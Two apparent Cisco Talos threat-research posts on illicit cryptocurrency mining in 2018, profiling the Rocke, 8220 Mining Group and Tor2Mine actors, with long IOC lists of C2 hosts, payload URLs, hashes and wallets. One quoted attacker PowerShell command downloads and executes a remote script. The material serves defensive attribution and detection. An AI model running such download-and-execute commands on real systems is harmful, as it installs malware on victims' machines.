This mass migration does have its risks, however. Primary among them is the value of the currency being mined. When we first wrote about malicious cryptocurrency mining, an adversary could hope to make about $0.25 per day for a basic home computer. As of the writing of this blog, that value has cratered to a little more than $0.04 per day for that same computer. As you can imagine, this has had an impact on adversaries' bottom lines. It now takes almost six systems to create the same revenue that one generated previously. Before we get too deep into the potential impact, let's discuss the size and scope of the role that cryptocurrency mining had on the threat landscape in 2018. One of the most interesting aspects is how widely this shift was adopted across multiple different attack avenues including spam, web and active exploitation.

Spam and the mining effect

One of the best indicators for how a threat is affecting the threat landscape is spam levels. Much of the spam we see on a daily basis is being generated from botnets, and those botnets are undertaking that activity to generate revenue. This is where we have seen some shifts throughout the year of cryptocurrency mining. As you can see, below the amount of overall spam, excluding two extremely high volume campaigns early in 2018, is down.
Late in 2017 and continuing into early in 2018, spam levels were dropping.Since then, they have begun to rise, and are now approaching the levels seen through most of 2017. This is indicative of botnet functionality shifts where some of the systems that had previously been used to send spam may have been altered to instead work on cryptocurrency mining. There have been reports throughout the past year of botnets such as Necurs experimenting with cryptocurrency mining instead of spam generation. However, there are two sides to the spam landscape, and they tell two different stories. One side are those that control the botnets that send spam, the other uses spam as a mechanism to spread their malware.

Adversaries that deliver their malware via spam are a different demographic, and as such, the landscape appears slightly different. Early on in 2018,Talos saw near constant campaigns delivering malicious cryptocurrency miners directly or using a downloader. As the year progressed, and more recently as the price of cryptocurrencies began to waiver, we are seeing adversaries push into different areas, delivering different payloads.

Emotet became one of the big winners as cryptocurrency miners waned. We have seen Emotet continue to be delivered in large numbers when active. Emotet continues to be a highly effective, modular payload that contains several functions, now including ransomware. These types of modular malware frameworks that allow adversaries to deliver varied payloads are going to continue to rise in popularity, as the final payload can depend on a lot of external factors. Today, when looking at the spam landscape, you do periodically see campaigns delivering miners, but they are far less common than they were earlier in 2018.Now, you are more likely to find a RAT or modular threat like Emotet than a miner. Cryptocurrency mining has had a marked impact on the email threat landscape in 2018, but email is just one of the key indicators on the threat landscape. Next, we'll take a look at web-based attacks.

Web

Web-based attacks continue to be heavily leveraged by attackers to compromise systems around the world. In previous years, exploit kits and malvertising campaigns were used to distribute ransomware and other threats to compromised systems. Since late 2016, there has been a marked decline in global exploit kit activity. Of the campaigns that remained, malicious cryptomining payloads were being distributed commonly via downloaders, rather than some of the other malware that had been historically associated with these campaigns. Along with exploit kits and malvertising, cryptocurrency mining malware was also frequently seen being delivered through fake Flash Player updates. In these attacks, victims are prompted to update their version of Adobe Flash Player, but the malware downloads a payload used to infect systems and mine cryptocurrency for cybercriminals.

Likewise, "in-browser" mining such as CoinHive became popular with many websites using scripts embedded on web pages that cause visitors of the websites to mine cryptocurrency in their web browsers. Cryptocurrency mining became so mainstream in 2018 that some shareware applications were even prompting users to allow them to leverage their systems to mine cryptocurrency as a way to support the application's developers. Regardless of the methodology, there is too much of an opportunity for adversaries to pass up. Malicious cryptocurrency mining can involve almost no additional communications, and in the case of in-browser or shareware-supported mining, it's as simple as "some money is better than no money." As long as there is money to be made, malicious or unauthorized cryptocurrency mining will be part of daily life on the internet. We've covered web and email, now let's now turn our focus to more active measures that adversaries take with direct, active exploitation.

Active exploitation

One unique aspect of malicious cryptocurrency mining is that the amount of revenue a compromised system can generate is directly related to the hardware that the system is running. Cisco Talos observed, for at least a year, as adversaries discussed the potential for malicious cryptocurrency mining and then implement those capabilities. Talos has seen countless examples of how active exploitation can play a significant role in malicious cryptocurrency mining.

From Apache Struts to Eternal Blue, Oracle WebLogic, and other widespread remotely exploitable bugs, adversaries have been actively exploiting systems to deliver hordes of miners. In some cases, adversaries added worming functionality — meaning it can self-replicate and affect other machines — to infect large swaths of machines as fast as possible. Regardless of the methodology, servers are a vital target for malicious cryptocurrency mining because of the increased revenue potential. This has mainly remained steady despite the volatility of the value in the currency itself. The fact remains that cryptocurrency mining generates revenue, and once an actor or group of actors has taken the time and cost to retool for a new threat, it's going to take a lot to move them off of that particular payload. If there were to be a significant global shift in cryptocurrency mining, this would be the place that it would likely be most noticeable. Each area of the threat landscape has been impacted in some way by cryptocurrency mining, but the real-life impacts are where enterprises are most concerned.

For more detail on the progression of these campaigns over the past year, with a specific focus on these active exploitation campaigns, see our accompanying blog here.

Real-life impact

One of the best indicators of where we are with a threat is the real-life impact. For this blog, there are two primary areas where that data will be: from the endpoint and the network. Without question, cryptocurrency mining has been the dominant threat on the threat landscape for much, if not all, of 2018. The most common alert we received in 2018 was related to cryptocurrency mining, its delivery, or its propagation by a significant margin. What's even more interesting is it doesn't appear to be fading, at least not yet.

When we began looking at the data, the expectation was that the overall amount of cryptocurrency mining activity would be decreasing in recent months, but that wasn't the case. There has been a small decrease in the amount of cryptocurrency mining activity, but those have been pigeonholed into a couple of areas of the threat landscape. The most substantial decrease has been in the number of malicious spam emails. Earlier on in 2018, we would see campaigns running around the clock delivering cryptocurrency miners. By the end of 2018, that was not the case.Instead, it's threats like RATs and Emotet that are dominating that particular landscape.
As you can see, there has been some variance in the number of events from week to week over the past six months, but generally, the trend line has held, and the overall volume of alerts has not changed significantly since June 2018.

Let's start by looking at network-based detections.In this particular circumstance, we are looking specifically at cryptocurrency mining activity on the wire, and not the delivery or propagation of the miners. This is a clean look specifically at actual mining activity instead of the distribution. Notice that if you look at the trend line, levels have increased slightly dating back to June. So despite the fact that we do not see miners being pushed at the same level, specifically in the email space, the overall capabilities remain primarily static. This implies both long-term mining activity and the importance of active exploitation, brute forcing and web-based attacks to the threat landscape, specifically around malicious mining.
The endpoint data held steady for the most part but it does vary more widely from one day to the next. That could be the result of systems being shut down or cleaned at irregular intervals. Regardless, you do not see any significant downward movement, including the last month when the price of cryptocurrencies truly cratered.

Cryptocurrency price crash

The real driving factor behind this potential large-scale shift is the value of cryptocurrency across the board. It reached levels in late 2017 that were not thought possible a mere six months earlier. As that rise continued, extreme interest in cryptocurrencies rose along with it. Quickly, people that had invested thousands of dollars a few years prior were now knocking on the door of being millionaires. This also coincided with the rise of ransomware, since cryptocurrencies are the primary method of payment.

The benefits weren't restricted to those that adopted the new currency early on. Adversaries and businesses alike found themselves sitting on sizable chunks of digital currency. Bad actors that were accepting bitcoin early on saw its value increase by tenfold, if not more, but there were always murmurs and skepticism around the meteoric rise in value.

Over the past six months, the value of cryptocurrencies had begun to fade, and over the last month-plus, the values have plummeted. At this point, most of the currencies have lost at least 75 percent of their peak values and late investors and adversaries may be paying the price.
Late in 2017, Bitcoin set an all-time high of nearly $20,000, and since then, it's been a steady decline to a value of less than $4,000, a decline of more than 75 percent from its peak in December 2017.
Monero has followed a similar path, albeit on a smaller scale. Early in 2018, Monero prices hit an all-time high of just above $470 per coin and a steady decline has followed throughout 2018. The value has now cratered to below $55 a coin — an astonishing loss of 86 percent of its value in less than a year as of the time of writing.

Although it's been a steady decline throughout the past year, the last month has been particularly brutal. Both Bitcoin and Monero have been hemorrhaging value in the past 30 days, and the effects are stark. Bitcoin has lost an improbable 40 percent of its value in the last month, only to be topped by Monero, which lost a staggering 50 percent of its value in the past 30 days.

Despite its recent collapse, it's evident that cryptocurrency is here to stay and will remain a player on the threat landscape for quite some time. For adversaries using cryptocurrency for payments such as ransomware, it doesn't have much of an effect, they increase the amount of coin they request to account for the decreased value.

Future of mining

Now that all the data has been discussed the real question remains: What does this mean for the future of mining?

The honest answer is we don't know, but there is plenty of room to speculate. The first thing to realize is cryptocurrency mining is a large portion of the threat landscape, and it will continue to be, but the question is where. The tooling and methodology required to make the shift for a threat group doing things like active exploitation and brute forcing are going to be exceedingly different from those looking to compromise average users using threats like cryptocurrency mining, RATs and banking trojans, among others. As such, the outlook for their respective landscapes differs significantly.

Those groups that focus on active exploitation and brute forcing are all in on mining, and it will take some additional force to move them off of this payload, mainly because of the resources they've already committed. It takes time and effort to shift away from things like distributed denial-of-service and spam botnets to cryptomining. Many of these adversaries took the time and effort to shift away and focus on mining. A decrease in the value of the currency isn't going to move them off of that.

Additionally, it's a question of risk and opportunity. Conducting a campaign of malicious cryptocurrency mining is far less likely to draw the attention of a security team or law enforcement when compared to some of the noisier threats like ransomware that requires command and control, victim interaction and continued communications. Malicious mining, on the other hand, allows for somewhat stable revenue generation, despite being a potentially limited earning potential per system. Money is money, and if you are operating at scale and stealing all the resources, it's primarily profit.

Conclusion

Malicious cryptocurrency mining is a massive part of the threat landscape in 2018 and appears poised to remain a significant player in 2019 and beyond. Despite the recent catastrophic price collapse of these currencies, it is still profitable in many circumstances. That does not mean that the collapse has had no impact —we've seen that it has had an impact on the volume of spam.

The data shows that this activity has been steady for the past six months and although there is a potential for a significant shift in the next six months, at least so far, it isn't in the data. Time will be the true wildcard in how mining lives on. Given time, adversaries may find a more attractive target, but right now, there are not many options that generate reliable income, with minimal risk, and don't require remote access of compromised systems. This is probably the biggest reason why mining isn't going anywhere:It's profitable. And because it's easy, anyone looking to make money will be drawn to it.

The real question is: What's next? What are the threats that enterprises should be preparing for today? Modular, flexible malware is likely the path forward as the avenues for monetization continues to change and evolve. Adversaries that are driven by monetary gain stand to generate the most revenue if they profile the end system, much like downloaders can and do today. If you compromise a gaming system or a high-end server a threat like a miner might be ideal. However, if you compromise a high-end laptop located in the U.S., you may decide ransomware is the best avenue, or if it's part of a corporate domain, just monetizing the access might be preferred. Or when compromising an average computer in a developing country, a simple bot might be best to provide a foothold to propagate an actor's malicious intentions or attack other systems and computers with an added layer of anonymity.

Regardless, it's clear why adversaries desire this type of flexibility. As systems get faster and the ways that a compromised system can be monetized continue to grow, modular malware will rise in popularity.

Connecting the dots between recently active cryptominers

Post authored by David Liebenberg and Andrew Williams.

Executive Summary

Through Cisco Talos' investigation of illicit cryptocurrency mining campaigns in the past year, we began to notice that many of these campaigns shared remarkably similar TTPs, which we at first mistakenly interpreted as being attributed to a single actor. However, closer analysis revealed that a spate of illicit mining activity over the past year could be attributed to several actors that have netted them hundreds of thousands of U.S. dollars combined.

This blog examines these actors' recent campaigns, connects them to other public investigations and examines commonalities among their toolsets and methodologies.

We will cover the recent activities of these actors:
  • Rocke —A group that employs Git repositories, HTTP FileServers (HFS), and Amazon Machine Images in their campaigns, as well as a myriad of different payloads, and has targeted a wide variety of servers, including Apache Struts2, Jenkins and JBoss.
  • 8220 Mining Group —Active since 2017, this group leverages Pastebin sites, Git repositories and malicious Docker images. The group targets Drupal, Hadoop YARN and Apache Struts2.
  • Tor2Mine —A group that uses tor2web to deliver proxy communications to a hidden service for command and control (C2).
These groups have used similar TTPs, including:
  • Malicious shell scripts masquerading as JPEG files with the name "logo*.jpg" that install cron jobs and download and execute miners.
  • The use of variants of the open-source miner XMRig intended for botnet mining, with versions dependent on the victim's architecture.
  • Scanning for and attempting to exploit recently published vulnerabilities in servers such as Apache Struts2, Oracle WebLogic and Drupal.
  • Malicious scripts and malware hosted on Pastebin sites, Git repositories and domains with .tk TLDs.
  • Tools such as XHide Process Faker, which can hide or change the name of Linux processes and PyInstaller, which can convert Python scripts into executables.
We were also able to link these groups to other published research that had not always been linked to the same actor. These additional campaigns demonstrate the breadth of exploitation activity that illicit cryptocurrency mining actors engaged in.

The recent decline in the value of cryptocurrency is sure to affect the activities of these adversaries. For instance, Rocke began developing destructive malware that posed as ransomware, diversifying their payloads as a potential response to declining cryptocurrency value. This was a trend that the Cyber Threat Alliance had predicted in their 2018 white paper on the illicit cryptocurrency threat. However, activity on Git repositories connected to the actors demonstrates that their interest in illicit cryptocurrency mining has not completely abated. Talos published separate research today covering this trend.

Timeline of actors' campaigns

Timeline of Activity

Introduction

Illicit cryptocurrency mining remained one of the most common threats Cisco Talos observed in 2018. These attacks steal CPU cycles from compromised devices to mine cryptocurrencies and bring in income for the threat actor. Campaigns delivering mining malware can also compromise the victim in other ways, such as in delivering remote access trojans (RATs) and other malware.

Through our investigation of illicit cryptocurrency mining campaigns in the past year, we began to notice that many shared remarkably similar TTPs, which we at first mistakenly interpreted as being attributed to a single actor. After completing analysis of these attack's wallets and command and control (C2) servers we discovered that a spate of illicit mining activity over the past year could be attributed to several actors. This illustrates the prevalent use of tool sharing or copying in illicit mining.

We also observed that, by examining these groups' infrastructure and wallets, we were able to connect them to other published research that had not always been related to the same actor, which demonstrated the breadth of exploitation activity that illicit cryptocurrency mining actors engaged in.

We first started tracking these groups when we began monitoring a prolific actor named Rocke and noticed that several other groups were using similar TTPs.

We began following the activities of another prolific actor through a project forked on GitHub by Rocke: the 8220 Mining Group. We also noticed a similar toolset being used by an actor we named "tor2mine," based on the fact that they additionally used tor2web services for C2 communications.

We also discovered some actors that share similarities to the aforementioned groups, but we could not connect them via network infrastructure or cryptocurrency wallets. Through investigating all these groups, we determined that combined, they had made hundreds of thousands of dollars in profits.

Rocke/Iron cybercrime group

Cisco Talos wrote about Rocke earlier this year, an actor linked to the Iron Cybercrime group that actively engages in distributing and executing cryptocurrency mining malware using a varied toolkit that includes Git repositories, HTTP FileServers (HFS), and a myriad of different payloads, including shell scripts, JavaScript backdoors, as well as ELF and PE miners. Talos first observed this actor when they attacked our honeypot infrastructure.

In the campaigns we discussed, Rocke targeted vulnerable Apache Struts2 servers in the spring and summer of 2018. Through tracking the actor's wallets and infrastructure, we were able to link them to some additional exploit activity that was reported on by other security firms but in most instances was not attributed to one actor. Through examining these campaigns that were not previously linked, we observed that Rocke has also targeted Jenkins and JBoss servers, continuing to rely on malicious Git repositories, as well as malicious Amazon Machine Images. They have also been expanding their payloads to include malware with worm-like characteristics and destructive ransomware capabilities. Several campaigns used the XHide Process Faker tool.

We have since discovered additional information that suggests that Rocke has been continuing this exploit activity. Since early September, we have observed Rocke exploiting our Struts2 honeypots to download and execute files from their C2 ssvs[.]space. Beginning in late October, we observed this type of activity in our honeypots involving another Rocke C2 as well: sydwzl[.]cn.

The dropped malware includes ELF (Executable and Linkable Format) backdoors, bash scripts to download and execute other malware from Rocke C2s, as well as illicit ELF Monero miners and associated config files.

While keeping an eye on honeypot activity related to Rocke, we have continued to monitor their GitHub account for new activity. In early October, Rocke forked a repository called whatMiner, developed by a Chinese-speaking actor. WhatMiner appears to have been developed by another group called the 8220 Mining Group, which we will discuss below. The readme for the project describes it as "collecting and integrating all different kinds of illicit mining malware."

Git repository for whatMiner

Looking at some of the bash scripts in the repository, it appears that they scan for and exploit vulnerable Redis and Oracle WebLogic servers to download and install Monero miners. The scripts also rely on a variety of Pastebin pages with Base64-encoded scripts in them that download and execute miners and backdoors on to the victim's machines. These malicious scripts and malware masquerade as JPEG files and are hosted on the Chinese-language file-sharing site thyrsi[.]com. The only difference in Rocke's forked version is that they replaced the Monero wallet in the config file with a new one.

While looking through this repository, we found a folder called "sustes." There were three samples in this folder: mr.sh, a bash script that downloads and installs an illicit Monero miner; xm64, an illicit Monero miner; and wt.conf, a config file for the miner. These scripts and malware very closely match the ones we found in our honeypots with the same file names, although the bash script and config file were changed to include Rocke's infrastructure and their Monero wallet.

Many of the samples obtained in our honeypots reached out to the IP 118[.]24[.]150[.]172 over TCP. Rocke's C2, sydwzl[.]cn, also resolves to this IP, as did the domain sbss[.]f3322[.]net, which began experiencing a spike in DNS requests in late October. Two samples with high detection rates submitted to VirusTotal in 2018 made DNS requests for both domains. Both samples also made requests for a file called "TermsHost.exe" from an IP 39[.]108[.]177[.]252, as well as a file called "xmr.txt" from sydwzl[.]cn. In a previous Rocke campaign, we observed a PE32 Monero miner sample called "TermsHost.exe" hosted on their C2 ssvs[.]space and a Monero mining config file called "xmr.txt" on the C2 sydwzl[.]cn.

When we submitted both samples in our ThreatGrid sandbox, they did not make DNS requests for sydwzl[.]cn, but did make GET requests for hxxp://users[.]qzone[.]qq[.]com:80/fcg-bin/cgi_get_portrait.fcg?uins=979040408. The resulting download is an HTML text file of a 301 error message. When we looked at the profile for the user 979040408@qq.com, we observed that they had numerous posts related to Chinese-language hacking and exploit forums, as well as advertisements for distributed denial-of-service (DDoS) services.

Note that Rocke activity tapered off towards the end of the year. Security researchers at Chinese company Alibaba have taken down Rocke infrastructure that was hosted on Alibaba Cloud. In addition, there has not been activity on Rocke’s github since November, nor have we seen related samples in our honeypots since that time.

8220 Mining Group

As we previously described, Rocke originally forked a repository called "whatMiner." We believe this tool is linked to another Chinese-speaking, Monero-mining threat actor — 8220 Mining Group — due to the repository's config files' default wallet and infrastructure. Their C2s often communicate over port 8220, earning them the 8220 Mining Group moniker. This group uses some similar TTPs to Rocke.

We first observed the 8220 Mining Group in our Struts2 honeypots in March 2018. Post-exploitation, the actor would issue a cURL request for several different types of malware on their infrastructure over port 8220. The dropped malware included ELF miners, as well as their associated config files with several of 8220 Mining Group's wallets entered in the appropriate fields. This is an example of the type of commands we observed:
We were able to link the infrastructure and wallets observed in the attacks against our honeypots, as well as in the Git repository, with several other campaigns that the 8220 mining group is likely responsible for.

These campaigns illustrate that beyond exploiting Struts2, 8220 Mining Group has also exploited Drupal content management system, Hadoop YARN, Redis, Weblogic and CouchDB. Besides leveraging malicious bash scripts, Git repositories and image sharing services, as in whatMiner, 8220 Mining Group also carried out a long-lasting campaign using malicious Docker images. 8220 Mining Group was able to amass nearly $200,000 worth of Monero through their campaigns.

There were some similarities to the TTPs used by Rocke and 8220 Mining Group in these campaigns. The actors downloaded a malicious file "logo*.jpg" (very similar to Rocke's use of malicious scripts under the file name of "logo*.jpg payloads), which gets executed through the bash shell to deliver XMRig. The actor also employed malicious scripts hosted on .tk TLDs, Pastebin sites, and Git repositories, which we have also observed Rocke employing.

tor2mine

Over the past few years, Talos has been monitoring accesses for tor2web services, which serve as a bridge between the internet and the Tor network, a system that allows users to enable anonymous communication. These services are useful for malware authors because they eliminate the need for malware to communicate with the Tor network directly, which is suspicious and may be blocked, and allow the C2 server's IP address to be hidden.

Recently, while searching through telemetry data, we observed malicious activity that leveraged a tor2web gateway to proxy communications to a hidden service for a C2: qm7gmtaagejolddt[.]onion[.]to.

It is unclear how the initial exploitation occurs, but at some point in the exploitation process, a PowerShell script is downloaded and executed to install follow-on malware onto the system:

C:\\Windows\\System32\\cmd.exe /c powershell.exe -w 1 -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command iex ((New-Object System.Net.WebClient).DownloadString('hxxp://107[.]181[.]187[.]132/v1/check1.ps1'))

We identified additional malware on this IP, which belongs to Total Server Solutions LLC. They appear to include 64-bit and 32-bit variants of XMRigCC — a variant of the XMRig miner, Windows executable versions of publically available EternalBlue/EternalRomance exploit scripts,an open-source TCP port scanner, and shellcode that downloads and executes a malicious payload from the C2. Additional scripts leverage JavaScript, VBScript, PowerShell and batch scripts to avoid writing executables to the disk.

We began to research the malware and infrastructure used in this campaign. We observed previous research on a similar campaign. This actor was exploiting CVE-2018-11776, an Apache Struts 2 namespace vulnerability. The actor also relied on an IP hosted on Total Server Solutions LLC (107[.]181[.]160[.]197). They also employed a script, "/win/checking-test.hta," that was almost identical to one we saw hosted on the tor2mine actors C2, "check.hta:"

/win/checking-test.hta from previous campaign
check.hta
This actor dropped XMRigCC as a payload, mining to eu[.]minerpool[.]pw, as well. Both campaigns additionally relied on the XHide Process-faker tool.

Similarly, in February 2018, Trend Micro published a report on an actor exploiting an Oracle WebLogic WLS-WSAT vulnerability to drop 64-bit and 32-bit variants of XMRig. The actors used many similar supporting scripts that we observed during the tor2web campaigns, and also used a C2 hosted on Total Server Solutions LLC (hxxp://107[.]181[.]174[.]248). They also mined to eu[.]minerpool[.]pw.

This malware was developed in Python and then changed to ELF executables using the PyInstaller tool for distribution. This is the same technique we observed in a Rocke campaign.

Conclusion

Through tracking the wallets of these groups, we estimate that they hold and have made payments totaling around 1,200 Monero. Based on public reporting, these groups combined had earned hundreds of thousands of dollars worth of cryptocurrency. However, it is difficult to ascertain the exact amount they made since the value of Monero is very volatile and it is difficult to tell the value of the currency when it was sold. We were also unable to track holdings and payments for certain kinds of wallets, such as MinerGate.

The value of Monero has dramatically declined in the past few months. Talos has observed less activity from these actors in our honeypots since November, although cryptocurrency-focused attacks from other actors continue.

There remains the possibility that with the value of cryptocurrencies so low, threat actors will begin delivering different kinds of payloads. For example, Rocke has been observed developing new malware with destructive capabilities that pose as ransomware. However, Rocke’s GitHub page shows that, as of early November, they were continuing to fork mining-focused repositories, including a static build of XMRig.

Talos will continue to monitor these groups, as well as cryptocurrency mining-focused attacks in general, to assess what changes, if any, arise from the decline in value of cryptocurrencies.

Coverage

For coverage related to blocking illicit cryptocurrency mining, please see the Cisco Talos white paper: Blocking Cryptocurrency Mining Using Cisco Security Products

Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.

Cisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks.

Network Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), and Meraki MX can detect malicious activity associated with this threat.

AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

Open Source SNORTⓇ Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

IOCs

Rocke

IPs:
121[.]126[.]223[.]211
142[.]44[.]215[.]177
144[.]217[.]61[.]147
118[.]24[.]150[.]172
185[.]133[.]193[.]163

Domains:
xmr.enjoytopic[.]tk
d.paloaltonetworks[.]tk
threatpost[.]tk
3g2upl4pq6kufc4m[.]tk
scan.3g2upl4pq6kufc4m[.]tk
e3sas6tzvehwgpak[.]tk
sample.sydwzl[.]cn
blockbitcoin[.]com
scan.blockbitcoin[.]tk
dazqc4f140wtl[.]cloudfront[.]net
d3goboxon32grk2l[.]tk
enjoytopic[.]tk
realtimenews[.]tk
8282[.]space
3389[.]space
svss[.]space
enjoytopic[.]esy[.]es
lienjoy[.]esy[.]es
d3oxpv9ajpsgxt[.]cloudfront[.]net
d3lvemwrafj7a7[.]cloudfront[.]net
d1ebv77j9rbkp6[.]enjoytopic[.]com
swb[.]one
d1uga3uzpppiit[.]cloudfront[.]net
emsisoft[.]enjoytopic[.]tk
ejectrift[.]censys[.]xyz
scan[.]censys[.]xyz
api[.]leakingprivacy[.]tk
news[.]realnewstime[.]xyz
scan[.]realnewstime[.]xyz
news[.]realtimenews[.]tk
scanaan[.]tk
www[.]qicheqiche[.]com

URLs:
hxxps://github[.]com/yj12ni
hxxps://github[.]com/rocke
hxxps://github[.]com/freebtcminer/
hxxps://github[.]com/tightsoft
hxxps://raw[.]githubusercontent[.]com/ghostevilxp
hxxp://www[.]qicheqiche[.]com
hxxp://123[.]206[.]13[.]220:8899
hxxps://gitee[.]com/c-888/
hxxp://gitlab[.]com/c-18
hxxp://www[.]ssvs[.]space/root[.]bin
hxxp://a[.]ssvs[.]space/db[.]sh
hxxp://a[.]ssvs[.]space/cf[.]cf
hxxp://a[.]ssvs[.]space/pluto
hxxp://ip[.]ssvs[.]space/xm64
hxxp://ip[.]ssvs[.]space/wt[.]conf
hxxp://ip[.]ssvs[.]space/mr[.]sh
hxxp://a[.]ssvs[.]space/logo[.]jpg
hxxp://a[.]sydwzl[.]cn/root[.]bin
hxxp://a[.]sydwzl[.]cn/x86[.]bin
hxxp://a[.]sydwzl[.]cn/bar[.]sh
hxxp://a[.]sydwzl[.]cn/crondb
hxxp://a[.]sydwzl[.]cn/pools[.]txt
hxxps://pastebin[.]com/raw/5bjpjvLP
hxxps://pastebin[.]com/raw/Fj2YdETv
hxxps://pastebin[.]com/raw/eRkrSQfE
hxxps://pastebin[.]com/raw/Gw7mywhC
hxxp://thyrsi[.]com/t6/387/1539580368x-1566688371[.]jpg
hxxp://thyrsi[.]com/t6/387/1539579140x1822611263[.]jpg
hxxp://thyrsi[.]com/t6/387/1539581805x1822611359[.]jpg
hxxp://thyrsi[.]com/t6/387/1539592750x-1566688347[.]jpg
hxxp://thyrsi[.]com/t6/373/1537410750x-1566657908[.]jpg
hxxp://thyrsi[.]com/t6/373/1537410304x-1404764882[.]jpg
hxxp://thyrsi[.]com/t6/377/1538099301x-1404792622[.]jpg
hxxp://thyrsi[.]com/t6/362/1535175343x-1566657675[.]jpg
hxxp://users[.]qzone[.]qq[.]com:80/fcg-bin/cgi_get_portrait.fcg?uins=979040408

SHA-256:
55dbdb84c40d9dc8c5aaf83226ca00a3395292cc8f884bdc523a44c2fd431c7b root.bin
00e1b4874f87d124b465b311e13565a813d93bd13d73b05e6ad9b7a08085b683 root.bin
cdaa31af1f68b0e474ae1eafbf3613eafae50b8d645fef1e64743c937eff31b5 db.sh
959230efa68e0896168478d3540f25adf427c7503d5e7761597f22484fc8a451 cf.cf
d11fa31a1c19a541b51fcc3ff837cd3eec419403619769b3ca69c4137ba41cf3 pluto/xm64
da641f86f81f6333f2730795de93ad2a25ab279a527b8b9e9122b934a730ab08 root.bin
2914917348b91c26ffd703dcef2872115e53dc0b71e23ce40ea3f88215fb2b90 wt.conf
b1c585865fdb16f3696626ef831b696745894194be9138ac0eb9f6596547eed9 mr.sh
7de435da46bf6bcd1843410d05c017b0306197462b0ba1d8c84d6551192de259 root.bin
904261488b24dfec2a3c8dee34c12e0ae2cf4722bd06d69af3d1458cd79e8945 logo.jpg
f792db9a05cde2eac63c262735d92f10e2078b6ec299ce519847b1e089069271 root.bin
dcf2b7bf7f0c8b7718e47b0d7269e0d09bb1bdbf6d3248a53ff0e1c9ea5aa38d x86.bin
3074b307958f6b31448006cad398b23f12119a7d0e51f24c5203a291f9e5d0ec bar.sh
a598aa724c45b2d8b98ec9bc34b83f21b7ae73d68d030476ebd9d89fc06afe58 cron.db
74c84e47463fad4128bd4d37c4164fb58e4d7dcd880992fad16f79f20995e07e pools.txt

Samples making DNS requests for sydwzl[.]cn and sbss[.]f3322[.]net:
17c8a1d0e981386730a7536a68f54a7388ed185f5c63aa567d212dc672cf09e0
4347d37b7ea18caacb843064dc31a6cda3c91fa7feb4d046742fd9bd985a8c86

Wallets
rocke@live.cn
44NU2ZadWJuDyVqKvzapAMSe6zR6JE99FQXh2gG4yuANW5fauZm1rPuTuycCPX3D7k2uiNc55SXL3TX8fHrbb9zQAqEM64W
44FUzGBCUrwAzA2et2CRHyD57osHpmfTHAXzbqn2ycxtg2bpk792YCSLU8BPTciVFo9mowjakCLNg81WwXgN2GEtQ4uRuN3
45JymPWP1DeQxxMZNJv9w2bTQ2WJDAmw18wUSryDQa3RPrympJPoUSVcFEDv3bhiMJGWaCD4a3KrFCorJHCMqXJUKApSKDV
88RiksgPZR5C3Z8B51AQQQMy3zF9KFN7zUC5P5x2DYCFa8pUkY3biTQM6kYEDHWpczGMe76PedzZ6KTsrCDVWGXNRHqwGto

8220 Gang

45[.]32[.]39[.]40:8220
45[.]77[.]24[.]16
54[.]37[.]57[.]99:8220
67[.]21[.]81[.]179:8220
67[.]231[.]243[.]10:8220
98[.]142[.]140[.]13:8220
98[.]142[.]140[.]13:3333
98[.]142[.]140[.]13:8888
104[.]129[.]171[.]172:8220
104[.]225[.]147[.]196:8220
128[.]199[.]86[.]57:8220
142[.]4[.]124[.]50:8220
142[.]4[.]124[.]164:8220
158[.]69[.]133[.]17:8220
158[.]69[.]133[.]18:8220
158[.]69[.]133[.]20:3333
162[.]212[.]157[.]244:8220
165[.]227[.]215[.]212:8220
185[.]82[.]218[.]206:8220
192[.]99[.]142[.]226:8220
192[.]99[.]142[.]227
192[.]99[.]142[.]232:8220
192[.]99[.]142[.]235:8220
192[.]99[.]142[.]240:8220
192[.]99[.]142[.]248:8220
192[.]99[.]142[.]249:3333
192[.]99[.]142[.]251:80
192[.]99[.]56[.]117:8220
195[.]123[.]224[.]186:8220
198[.]181[.]41[.]97:8220
202[.]144[.]193[.]110:3333
hxxps://github[.]com/MRdoulestar/whatMiner

1e43eac49ff521912db16f7a1c6b16500f7818de9f93bb465724add5b4724a13
e2403b8198fc3dfdac409ea3ce313bbf12b464b60652d7e2e1bc7d6c356f7e5e
31bae6f19b32b7bb7188dd4860040979cf6cee352d1135892d654a4df0df01c1
cb5936e20e77f14ea7bee01ead3fb9d3d72af62b5118898439d1d11681ab0d35
cfdee84680d67d4203ccd1f32faf3f13e6e7185072968d5823c1200444fdd53e
efbde3d4a6a495bb7d90a266ab1e49879f8ac9c2378c6f39831a06b6b74a6803
384abd8124715a01c238e90aab031fb996c4ecbbc1b58a67d65d750c7ed45c52

Samples associated with whatMiner:
f7a97548fbd8fd73e31e602d41f30484562c95b6e0659eb37e2c14cbadd1598c
1f5891e1b0bbe75a21266caee0323d91f2b40ecc4ff1ae8cc8208963d342ecb7
3138f8ea7ba45d81318729703d9140c65effc15d56e61e928474dd277c067e04
241916012cc4288efd2a4b1f16d1db68f52e17e174425de6abee4297f01ec64f
3138f8ea7ba45d81318729703d9140c65effc15d56e61e928474dd277c067e04

Wallets
41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29TpKXpm3zKTUYo
4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg
46CQwJTeUdgRF4AJ733tmLJMtzm8BogKo1unESp1UfraP9RpGH6sfKfMaE7V3jxpyVQi6dsfcQgbvYMTaB1dWyDMUkasg3S

Tor2mine

107[.]181[.]160[.]197
107[.]181[.]174[.]248
107[.]181[.]187[.]132
asq[.]r77vh0[.]pw
194[.]67[.]204[.]189
qm7gmtaagejolddt[.]onion[.]to
res1[.]myrms[.]pw
hxxps://gitlab[.]com/Shtrawban
rig[.]zxcvb[.]pw
back123[.]brasilia[.]me

91853a9cdbe33201bbd9838526c6e5907724eb28b3a3ae8b3e0126cee8a46639 32.exe
44586883e1aa03b0400a8e394a718469424eb8c157e8760294a5c94dad3c1e19 64.exe
